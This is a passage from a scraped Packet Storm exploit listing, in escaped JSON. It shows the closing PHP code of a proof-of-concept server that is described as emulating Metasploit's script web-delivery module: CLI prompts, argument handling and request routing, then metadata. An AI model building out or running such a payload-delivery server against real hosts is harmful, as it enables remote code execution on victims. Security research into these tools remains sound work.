\\n private static function showWelcome()\\n {\\n echo \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 ADVANCED WEB DELIVERY SYSTEM SETUP \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\\\n\\”;\\n }\\n \\n private static function prompt($message, $default = \\”\\”)\\n {\\n echo \\”[?] {$message} \\”;\\n if ($default) echo \\”[{$default}] \\”;\\n \\n $input = trim(fgets(STDIN));\\n return $input ?: $default;\\n }\\n \\n private static function promptSelect($message, $options, $default)\\n {\\n echo \\”[?] {$message}\\\\n\\”;\\n foreach ($options as $i =\\u003e $option) {\\n $index = $i + 1;\\n echo \\” {$index}. {$option}\\” . ($option === $default ? \\” (default)\\” : \\”\\”) . \\”\\\\n\\”;\\n }\\n \\n $input = self::prompt(\\”Choice [1-\\” . count($options) . \\”]:\\”, array_search($default, $options) + 1);\\n $index = intval($input) – 1;\\n \\n return isset($options[$index]) ? $options[$index] : $default;\\n }\\n \\n private static function promptYesNo($message, $default)\\n {\\n $defaultText = $default ? ‘Y\/n’ : ‘y\/N’;\\n $input = self::prompt(\\”{$message} [{$defaultText}]:\\”, $default ? ‘Y’ : ‘N’);\\n \\n return strtolower($input) === ‘y’ || ($default \\u0026\\u0026 strtolower($input) !== ‘n’);\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Main Execution\\n \/\/ ========================\\n if (php_sapi_name() === ‘cli’) {\\n global $argv, $argc;\\n \\n if ($argc \\u003e 1) {\\n $options = [];\\n for ($i = 1; $i \\u003c $argc; $i++) {\\n if (strpos($argv[$i], ‘=’) !== false) {\\n list($key, $value) = explode(‘=’, $argv[$i], 2);\\n $options[$key] = $value;\\n }\\n }\\n \\n $server = new AdvancedWebDelivery($options);\\n $server-\\u003erun();\\n } else {\\n EnhancedCliInterface::run();\\n }\\n } elseif (php_sapi_name() === ‘cli-server’) {\\n $server = new AdvancedWebDelivery($config[‘defaults’]);\\n \\n $path = parse_url($_SERVER[‘REQUEST_URI’], PHP_URL_PATH);\\n $clientInfo = [\\n ‘ip’ =\\u003e $_SERVER[‘REMOTE_ADDR’] ?? ‘0.0.0.0’,\\n ‘path’ =\\u003e $path,\\n ‘method’ =\\u003e $_SERVER[‘REQUEST_METHOD’],\\n ‘headers’ =\\u003e getallheaders(),\\n ‘user_agent’ =\\u003e $_SERVER[‘HTTP_USER_AGENT’] ?? ‘Unknown’\\n ];\\n \\n $response = $server-\\u003ehandleRequest(”, $clientInfo);\\n \\n $lines = explode(\\”\\\\r\\\\n\\”, $response);\\n $statusLine = array_shift($lines);\\n \\n foreach ($lines as $line) {\\n if ($line === ”) break;\\n header($line);\\n }\\n \\n $body = substr($response, strpos($response, \\”\\\\r\\\\n\\\\r\\\\n\\”) + 4);\\n echo $body;\\n } else {\\n echo \\”\\u003ch1\\u003eAdvanced Script Web Delivery System\\u003c\/h1\\u003e\\”;\\n echo \\”\\u003cp\\u003eThis system must be run from the command line.\\u003c\/p\\u003e\\”;\\n echo \\”\\u003cpre\\u003eUsage: php \\” . basename(__FILE__) . \\” [options]\\u003c\/pre\\u003e\\”;\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214116″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214116\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-21T15:44:10″,”description”:”This project presents an advanced proof of concept that emulates the behavior of Metasploit’s multi\/script\/webdelivery module using PHP. The goal is to demonstrate how script-based…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-36700","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n